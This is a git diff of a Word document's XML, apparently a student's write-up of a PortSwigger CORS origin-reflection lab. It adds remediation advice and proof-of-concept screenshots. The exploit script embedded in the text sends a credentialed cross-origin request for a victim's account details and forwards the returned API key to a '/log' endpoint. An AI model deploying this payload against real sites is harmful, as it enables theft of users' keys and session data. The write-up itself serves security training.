--- a/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 1 - CORS vulnerability with basic origin reflection.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 1 - CORS vulnerability with basic origin reflection.docx
@@ -124,8 +124,27 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">Open the Proxy tab in BurpSuite and we notice that there is a request made named </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Open the Proxy tab in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>BurpSuite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and we notice that there is a request made named </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -136,6 +155,7 @@
         </w:rPr>
         <w:t>accountDetails</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -385,75 +405,217 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">    var req = new XMLHttpRequest();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    req.onload = reqListener;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    req.open('get','https://0aca008404c3aee5805a6c3300ed0005.web-security-academy.net/accountDetails',true);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    req.withCredentials = true;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    req.send();</w:t>
+        <w:t xml:space="preserve">    var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>req</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>XMLHttpRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>req.onload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>reqListener</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>req.open</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>('get','https://0aca008404c3aee5805a6c3300ed0005.web-security-academy.net/accountDetails',true);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>req.withCredentials</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = true;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>req.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -480,24 +642,90 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">    function reqListener() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        location='/log?apiKey='+this.responseText;</w:t>
+        <w:t xml:space="preserve">    function </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>reqListener</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        location='/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>log?apiKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>='+</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>this.responseText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -566,6 +794,126 @@
           <w:szCs w:val="40"/>
         </w:rPr>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Restrictive CORS Policy:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>The root cause of the vulnerability is the application's permissive CORS configuration. The application should never trust all origins. Update the Access-Control-Allow-Origin header to only allow trusted domains, rather than using a wildcard (*).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Credentials with CORS:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>If you absolutely have to use wildcards in CORS (e.g., for public API endpoints), ensure you don't support credentials (cookies, HTTP authentication, client-side SSL certificates). Set Access-Control-Allow-Credentials to false.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>API Key Protection:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>API keys should not be exposed directly in the client side. Rather than making calls directly from the client side that exposes API keys, consider making those calls from the server side. Use server-side sessions or another method to handle sensitive operations.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -670,6 +1018,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2C5F6873"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="135E6F52"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BB255C8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="18A49404"/>
@@ -762,6 +1199,9 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1088160684">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="696737968">
     <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>

--- a/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 1 - CORS vulnerability with basic origin reflection.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 1 - CORS vulnerability with basic origin reflection.docx
@@ -793,6 +793,220 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50980CF4" wp14:editId="7435C979">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>419100</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="2076450"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1727398779" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1727398779" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="2076450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="088CA294" wp14:editId="1645BC38">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>2497455</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="1955165"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="227352976" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="227352976" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="1955165"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48DC8D20" wp14:editId="501ED9F8">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>2382520</wp:posOffset>
